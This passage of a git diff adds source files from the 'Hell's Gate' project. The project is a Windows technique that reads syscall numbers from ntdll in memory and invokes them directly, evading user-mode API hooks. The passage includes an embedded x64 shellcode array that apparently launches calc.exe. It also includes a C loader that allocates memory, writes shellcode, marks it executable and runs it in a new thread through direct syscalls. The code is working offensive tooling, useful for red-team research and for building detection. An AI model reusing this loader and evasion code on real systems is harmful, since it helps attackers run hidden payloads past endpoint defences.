|
AddressOfNames DWORD ? ; 0x0020
|
||||||
|
AddressOfNameOrdinals DWORD ? ; 0x0024
|
||||||
|
IMAGE_EXPORT_DIRECTORY ends
|
42
Hells Gate/Assembly Expansion/main.c
Normal file
42
Hells Gate/Assembly Expansion/main.c
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
/**
|
||||||
|
* @file main.c
|
||||||
|
* @data 07-08-2020
|
||||||
|
* @author Paul Laîné(@am0nsec)
|
||||||
|
* @version 1.0
|
||||||
|
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
|
||||||
|
* @details
|
||||||
|
* @link https ://ntamonsec.blogspot.com/
|
||||||
|
* @copyright This project has been released under the GNU Public License v3 license.
|
||||||
|
*/
|
||||||
|
#include <Windows.h>
|
||||||
|
|
||||||
|
unsigned char Shellcode[] =
|
||||||
|
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||||
|
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||||
|
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||||
|
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
|
||||||
|
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
|
||||||
|
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
|
||||||
|
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
|
||||||
|
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
|
||||||
|
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
|
||||||
|
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
|
||||||
|
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
|
||||||
|
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
|
||||||
|
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
|
||||||
|
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
|
||||||
|
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
|
||||||
|
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
|
||||||
|
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
|
||||||
|
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
|
||||||
|
"\x63\x2e\x65\x78\x65\x00";
|
||||||
|
|
||||||
|
DWORD ShellcodeLength = sizeof(Shellcode);
|
||||||
|
|
||||||
|
extern BOOL HellsGate(void);
|
||||||
|
|
||||||
|
INT wmain() {
|
||||||
|
|
||||||
|
BOOL a = HellsGate();
|
||||||
|
|
||||||
|
}
|
31
Hells Gate/C Implementation/HellsGate.sln
Normal file
31
Hells Gate/C Implementation/HellsGate.sln
Normal file
@ -0,0 +1,31 @@
|
|||||||
|
|
||||||
|
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||||
|
# Visual Studio Version 16
|
||||||
|
VisualStudioVersion = 16.0.30114.105
|
||||||
|
MinimumVisualStudioVersion = 10.0.40219.1
|
||||||
|
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
|
||||||
|
EndProject
|
||||||
|
Global
|
||||||
|
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||||
|
Debug|x64 = Debug|x64
|
||||||
|
Debug|x86 = Debug|x86
|
||||||
|
Release|x64 = Release|x64
|
||||||
|
Release|x86 = Release|x86
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
|
||||||
|
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(SolutionProperties) = preSolution
|
||||||
|
HideSolutionNode = FALSE
|
||||||
|
EndGlobalSection
|
||||||
|
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||||
|
SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
|
||||||
|
EndGlobalSection
|
||||||
|
EndGlobal
|
161
Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
Normal file
161
Hells Gate/C Implementation/HellsGate/HellsGate.vcxproj
Normal file
@ -0,0 +1,161 @@
|
|||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<VCProjectVersion>16.0</VCProjectVersion>
|
||||||
|
<Keyword>Win32Proj</Keyword>
|
||||||
|
<ProjectGuid>{dc6187cb-d5df-4973-84a2-f92aae90cda9}</ProjectGuid>
|
||||||
|
<RootNamespace>HellsGate</RootNamespace>
|
||||||
|
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
|
<PlatformToolset>v142</PlatformToolset>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<SpectreMitigation>false</SpectreMitigation>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
<PlatformToolset>v142</PlatformToolset>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<SpectreMitigation>false</SpectreMitigation>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
|
<PlatformToolset>v142</PlatformToolset>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<SpectreMitigation>false</SpectreMitigation>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>Application</ConfigurationType>
|
||||||
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
|
<PlatformToolset>v142</PlatformToolset>
|
||||||
|
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||||
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<SpectreMitigation>false</SpectreMitigation>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="Shared">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
</ImportGroup>
|
||||||
|
<PropertyGroup Label="UserMacros" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<LinkIncremental>true</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<LinkIncremental>false</LinkIncremental>
|
||||||
|
</PropertyGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SDLCheck>true</SDLCheck>
|
||||||
|
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<ConformanceMode>true</ConformanceMode>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Console</SubSystem>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
|
<ClCompile>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<SDLCheck>true</SDLCheck>
|
||||||
|
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<ConformanceMode>true</ConformanceMode>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Console</SubSystem>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<SDLCheck>true</SDLCheck>
|
||||||
|
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<ConformanceMode>true</ConformanceMode>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Console</SubSystem>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
|
<ClCompile>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||||
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
|
<SDLCheck>true</SDLCheck>
|
||||||
|
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<ConformanceMode>true</ConformanceMode>
|
||||||
|
</ClCompile>
|
||||||
|
<Link>
|
||||||
|
<SubSystem>Console</SubSystem>
|
||||||
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
|
</Link>
|
||||||
|
</ItemDefinitionGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="main.c" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="structs.h" />
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<MASM Include="hellsgate.asm">
|
||||||
|
<FileType>Document</FileType>
|
||||||
|
</MASM>
|
||||||
|
</ItemGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||||
|
</ImportGroup>
|
||||||
|
</Project>
|
@ -0,0 +1,32 @@
|
|||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup>
|
||||||
|
<Filter Include="Source Files">
|
||||||
|
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||||
|
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Header Files">
|
||||||
|
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||||
|
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||||
|
</Filter>
|
||||||
|
<Filter Include="Resource Files">
|
||||||
|
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||||
|
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||||
|
</Filter>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClCompile Include="main.c">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</ClCompile>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<ClInclude Include="structs.h">
|
||||||
|
<Filter>Header Files</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<MASM Include="hellsgate.asm">
|
||||||
|
<Filter>Source Files</Filter>
|
||||||
|
</MASM>
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
23
Hells Gate/C Implementation/HellsGate/hellsgate.asm
Normal file
23
Hells Gate/C Implementation/HellsGate/hellsgate.asm
Normal file
@ -0,0 +1,23 @@
|
|||||||
|
; Hell's Gate
|
||||||
|
; Dynamic system call invocation
|
||||||
|
;
|
||||||
|
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
|
||||||
|
|
||||||
|
.data
|
||||||
|
wSystemCall DWORD 000h
|
||||||
|
|
||||||
|
.code
|
||||||
|
HellsGate PROC
|
||||||
|
mov wSystemCall, 000h
|
||||||
|
mov wSystemCall, ecx
|
||||||
|
ret
|
||||||
|
HellsGate ENDP
|
||||||
|
|
||||||
|
HellDescent PROC
|
||||||
|
mov r10, rcx
|
||||||
|
mov eax, wSystemCall
|
||||||
|
|
||||||
|
syscall
|
||||||
|
ret
|
||||||
|
HellDescent ENDP
|
||||||
|
end
|
211
Hells Gate/C Implementation/HellsGate/main.c
Normal file
211
Hells Gate/C Implementation/HellsGate/main.c
Normal file
@ -0,0 +1,211 @@
|
|||||||
|
#pragma once
|
||||||
|
#include <Windows.h>
|
||||||
|
#include "structs.h"
|
||||||
|
|
||||||
|
/*--------------------------------------------------------------------
|
||||||
|
VX Tables
|
||||||
|
--------------------------------------------------------------------*/
|
||||||
|
typedef struct _VX_TABLE_ENTRY {
|
||||||
|
PVOID pAddress;
|
||||||
|
DWORD64 dwHash;
|
||||||
|
WORD wSystemCall;
|
||||||
|
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
|
||||||
|
|
||||||
|
typedef struct _VX_TABLE {
|
||||||
|
VX_TABLE_ENTRY NtAllocateVirtualMemory;
|
||||||
|
VX_TABLE_ENTRY NtProtectVirtualMemory;
|
||||||
|
VX_TABLE_ENTRY NtCreateThreadEx;
|
||||||
|
VX_TABLE_ENTRY NtWaitForSingleObject;
|
||||||
|
} VX_TABLE, * PVX_TABLE;
|
||||||
|
|
||||||
|
/*--------------------------------------------------------------------
|
||||||
|
Function prototypes.
|
||||||
|
--------------------------------------------------------------------*/
|
||||||
|
PTEB RtlGetThreadEnvironmentBlock();
|
||||||
|
BOOL GetImageExportDirectory(
|
||||||
|
_In_ PVOID pModuleBase,
|
||||||
|
_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
|
||||||
|
);
|
||||||
|
BOOL GetVxTableEntry(
|
||||||
|
_In_ PVOID pModuleBase,
|
||||||
|
_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
|
||||||
|
_In_ PVX_TABLE_ENTRY pVxTableEntry
|
||||||
|
);
|
||||||
|
BOOL Payload(
|
||||||
|
_In_ PVX_TABLE pVxTable
|
||||||
|
);
|
||||||
|
PVOID VxMoveMemory(
|
||||||
|
_Inout_ PVOID dest,
|
||||||
|
_In_ const PVOID src,
|
||||||
|
_In_ SIZE_T len
|
||||||
|
);
|
||||||
|
|
||||||
|
/*--------------------------------------------------------------------
|
||||||
|
External functions' prototype.
|
||||||
|
--------------------------------------------------------------------*/
|
||||||
|
extern VOID HellsGate(WORD wSystemCall);
|
||||||
|
extern HellDescent();
|
||||||
|
|
||||||
|
INT wmain() {
|
||||||
|
PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
|
||||||
|
PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
|
||||||
|
if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
|
||||||
|
return 0x1;
|
||||||
|
|
||||||
|
// Get NTDLL module
|
||||||
|
PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
|
||||||
|
|
||||||
|
// Get the EAT of NTDLL
|
||||||
|
PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
|
||||||
|
if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
|
||||||
|
return 0x01;
|
||||||
|
|
||||||
|
VX_TABLE Table = { 0 };
|
||||||
|
Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
|
||||||
|
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
|
||||||
|
return 0x1;
|
||||||
|
|
||||||
|
Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
|
||||||
|
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
|
||||||
|
return 0x1;
|
||||||
|
|
||||||
|
Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
|
||||||
|
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
|
||||||
|
return 0x1;
|
||||||
|
|
||||||
|
Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
|
||||||
|
if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
|
||||||
|
return 0x1;
|
||||||
|
|
||||||
|
Payload(&Table);
|
||||||
|
return 0x00;
|
||||||
|
}
|
||||||
|
|
||||||
|
PTEB RtlGetThreadEnvironmentBlock() {
|
||||||
|
#if _WIN64
|
||||||
|
return (PTEB)__readgsqword(0x30);
|
||||||
|
#else
|
||||||
|
return (PTEB)__readfsdword(0x16);
|
||||||
|
#endif
|
||||||
|
}
|
||||||
|
|
||||||
|
DWORD64 djb2(PBYTE str) {
|
||||||
|
DWORD64 dwHash = 0x7734773477347734;
|
||||||
|
INT c;
|
||||||
|
|
||||||
|
while (c = *str++)
|
||||||
|
dwHash = ((dwHash << 0x5) + dwHash) + c;
|
||||||
|
|
||||||
|
return dwHash;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
|
||||||
|
// Get DOS header
|
||||||
|
PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
|
||||||
|
if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get NT headers
|
||||||
|
PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
|
||||||
|
if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
|
||||||
|
return FALSE;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get the EAT
|
||||||
|
*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
|
||||||
|
PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
|
||||||
|
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
|
||||||
|
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
|
||||||
|
|
||||||
|
for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
|
||||||
|
PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
|
||||||
|
PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
|
||||||
|
|
||||||
|
if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
|
||||||
|
pVxTableEntry->pAddress = pFunctionAddress;
|
||||||
|
|
||||||
|
// Quick and dirty fix in case the function has been hooked
|
||||||
|
WORD cw = 0;
|
||||||
|
while (TRUE) {
|
||||||
|
// check if syscall, in this case we are too far
|
||||||
|
if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
|
||||||
|
return FALSE;
|
||||||
|
|
||||||
|
// check if ret, in this case we are also probaly too far
|
||||||
|
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
|
||||||
|
return FALSE;
|
||||||
|
|
||||||
|
// First opcodes should be :
|
||||||
|
// MOV R10, RCX
|
||||||
|
// MOV RCX, <syscall>
|
||||||
|
if (*((PBYTE)pFunctionAddress + cw) == 0x4c
|
||||||
|
&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
|
||||||
|
&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
|
||||||
|
&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
|
||||||
|
&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
|
||||||
|
&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
|
||||||
|
BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
|
||||||
|
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
|
||||||
|
pVxTableEntry->wSystemCall = (high << 8) | low;
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
cw++;
|
||||||
|
};
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
BOOL Payload(PVX_TABLE pVxTable) {
|
||||||
|
NTSTATUS status = 0x00000000;
|
||||||
|
char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
|
||||||
|
|
||||||
|
// Allocate memory for the shellcode
|
||||||
|
PVOID lpAddress = NULL;
|
||||||
|
SIZE_T sDataSize = sizeof(shellcode);
|
||||||
|
HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
|
||||||
|
status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
|
||||||
|
|
||||||
|
// Write Memory
|
||||||
|
VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
|
||||||
|
|
||||||
|
// Change page permissions
|
||||||
|
ULONG ulOldProtect = 0;
|
||||||
|
HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
|
||||||
|
status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
|
||||||
|
|
||||||
|
// Create thread
|
||||||
|
HANDLE hHostThread = INVALID_HANDLE_VALUE;
|
||||||
|
HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
|
||||||
|
status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
|
||||||
|
|
||||||
|
// Wait for 1 seconds
|
||||||
|
LARGE_INTEGER Timeout;
|
||||||
|
Timeout.QuadPart = -10000000;
|
||||||
|
HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
|
||||||
|
status = HellDescent(hHostThread, FALSE, &Timeout);
|
||||||
|
|
||||||
|
return TRUE;
|
||||||
|
}
|
||||||
|
|
||||||
|
PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
|
||||||
|
char* d = dest;
|
||||||
|
const char* s = src;
|
||||||
|
if (d < s)
|
||||||
|
while (len--)
|
||||||
|
*d++ = *s++;
|
||||||
|
else {
|
||||||
|
char* lasts = s + (len - 1);
|
||||||
|
char* lastd = d + (len - 1);
|
||||||
|
while (len--)
|
||||||
|
*lastd-- = *lasts--;
|
||||||
|
}
|
||||||
|
return dest;
|
||||||
|
}
|
337
Hells Gate/C Implementation/HellsGate/structs.h
Normal file
337
Hells Gate/C Implementation/HellsGate/structs.h
Normal file
@ -0,0 +1,337 @@
|
|||||||
|
#pragma once
|
||||||
|
#include <Windows.h>
|
||||||
|
|
||||||
|
/*--------------------------------------------------------------------
|
||||||
|
